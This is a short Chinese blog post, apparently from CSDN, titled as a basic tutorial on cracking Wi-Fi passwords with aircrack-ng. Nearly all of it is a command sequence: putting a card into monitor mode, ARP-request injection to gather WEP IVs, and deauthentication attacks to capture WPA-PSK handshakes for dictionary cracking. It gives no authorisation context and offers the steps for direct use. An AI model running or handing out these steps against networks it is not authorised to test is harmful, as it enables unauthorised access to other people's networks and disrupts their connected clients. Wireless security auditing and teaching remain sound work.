小勇的博客

学会分享

aircrack-ng破解wifi密码基础教程

一、破解WEP:

由于WEP破解基于有效数据报文的积累,当收集到足够数量的ivs数据报文后就可以进行破解,对目标ap使用arprequest注入攻击。

1)ifconfig wlan0 up #激活无线网卡。

2)airmon-ng start  wlan0(无线网卡) #将无线网卡设置为混杂模式。

3)airodump-ng -w 文件名 -c 频道 mon0(处于混杂模式下的无线网卡) #对特定频道下的无线网络进行监听,扫描数据保存到特定文件

4)aireplay-ng -3 -b AP的mac地址 -h 客户端的mac地址  mon0(处于混杂模式下的无线网卡) #-3代表arprequest注入攻击,当注入后收集到的数据越多,破解速度越快,请注意WEP加密的wifi密码一定能够破解,所以WEP加密的wifi密码极不安全。

5)aircrack-ng 捕获的cap文件或ivs文件 #使用aircrack-ng工具破解得到密码。

二、破解WAP:

WPA-PSK的破解基于WPA-PSK握手验证报文数据的获取与识别,攻击者只要获取到尽可能的握手验证报文数据包就有机会破解。

1)ifconfig wlan0 up #激活无线网卡。

2)airmon-ng start wlan0(无线网卡) #将无线网卡设置为混杂模式。

3)airodump-ng -w 文件名 -c 频道 mon0(处于混杂模式下的无线网卡) #对特定频道下的无线网络进行监听,扫描数据保存到特定文件

4)aireplay-ng -0 10 -a AP的mac地址 -c 客户端的mac地址 mon0(处于混杂模式下的无线网卡) #-0代表deauth重传攻击方式,使客户端断开重连以便有机会得到握手验证数据报文

5)aircrack-ng -w 字典 捕获的cap文件  #使用预先准备好的字典破解密码,注意,WPA/WPA2加密的wifi密码是一种相对安全的密码保护机制,破解起来可嫩有一定的难度。

阅读更多
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/fengshenyue/article/details/49896579
个人分类: 2015年11月
上一篇vi基本操作命令
下一篇三种VMware数据备份和恢复方法
想对作者说点什么? 我来说一句

aircrack-ng详细教程

2014年06月22日 346KB 下载

没有更多推荐了,返回首页

关闭
关闭